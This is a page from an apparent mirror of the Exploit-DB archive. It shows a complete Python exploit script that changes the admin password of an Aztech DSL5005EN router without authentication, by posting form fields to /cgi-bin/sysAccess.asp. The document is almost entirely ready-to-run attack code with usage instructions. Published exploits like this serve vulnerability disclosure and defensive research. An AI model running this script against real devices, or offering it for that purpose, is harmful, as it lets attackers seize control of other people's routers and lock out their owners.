bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/hardware/remote/52093.txt
Exploit-DB 51ef1693d4 DB: 2025-03-23 
4 changes to exploits/shellcodes/ghdb

Aztech DSL5005EN Router - 'sysAccess.asp' Admin Password Change (Unauthenticated)

TeamPass 3.0.0.21 - SQL Injection

Microsoft Windows - NTLM Hash Leak Malicious Windows Theme
2025-03-23 00:16:32 +00:00

76 lines
No EOL
3 KiB
Text
Raw Permalink Blame History

# Exploit Title: Aztech DSL5005EN Router - 'sysAccess.asp' Admin Password Change (Unauthenticated)
# Date: 2025-02-26
# Exploit Author: Amir Hossein Jamshidi
# Vendor Homepage: https://www.aztech.com
# Version: DSL5005EN
# Tested on: Linux
# CVE: N/A
import requests
import argparse
print('''
#################################################################################
# aztech DSL5005EN router/modem - admin password change (Unauthenticated) #
# BY: Amir Hossein Jamshidi #
# Mail: amirhosseinjamshidi64@gmail.com #
# github: https://github.com/amirhosseinjamshidi64 #
# Usage: python Exploit.py --ip TRAGET_IP --password PASSWORD #
#################################################################################
''')
def change_password(ip_address, password):
"""
Changes the password of a device at the given IP address.
Args:
ip_address: The IP address of the device (e.g., "192.168.1.1").
password: The new password to set.
"""
url = f"http://{ip_address}/cgi-bin/sysAccess.asp"
origin = f"http://{ip_address}"
referer = f"http://{ip_address}/cgi-bin/sysAccess.asp"
payload = {
"saveFlag": "1",
"adminFlag": "1",
"SaveBtn": "SAVE",
"uiViewTools_Password": password,
"uiViewTools_PasswordConfirm": password
}
headers = {
"Cache-Control": "max-age=0",
"Accept-Language": "en-US,en;q=0.9",
"Origin": origin,
"Content-Type": "application/x-www-form-urlencoded",
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.86 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
"Referer": referer,
"Connection": "keep-alive"
}
try:
response = requests.post(url, data=payload, headers=headers, timeout=10)
if response.status_code == 200:
print(f"Password change request to {ip_address} successful!")
print(f"Username: admin")
print(f"Password: {password}")
else:
print(f"Request to {ip_address} failed with status code: {response.status_code}")
print(f"Response content:\n{response.text}") # Print response for debugging
except requests.exceptions.RequestException as e:
print(f"An error occurred: {e}")
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Change password of a device.")
parser.add_argument("--ip", dest="ip_address", required=True, help="The IP address of the device.")
parser.add_argument("--password", dest="password", required=True, help="The new password to set.")
args = parser.parse_args()
change_password(args.ip_address, args.password)
Reference in a new issue View git blame Copy permalink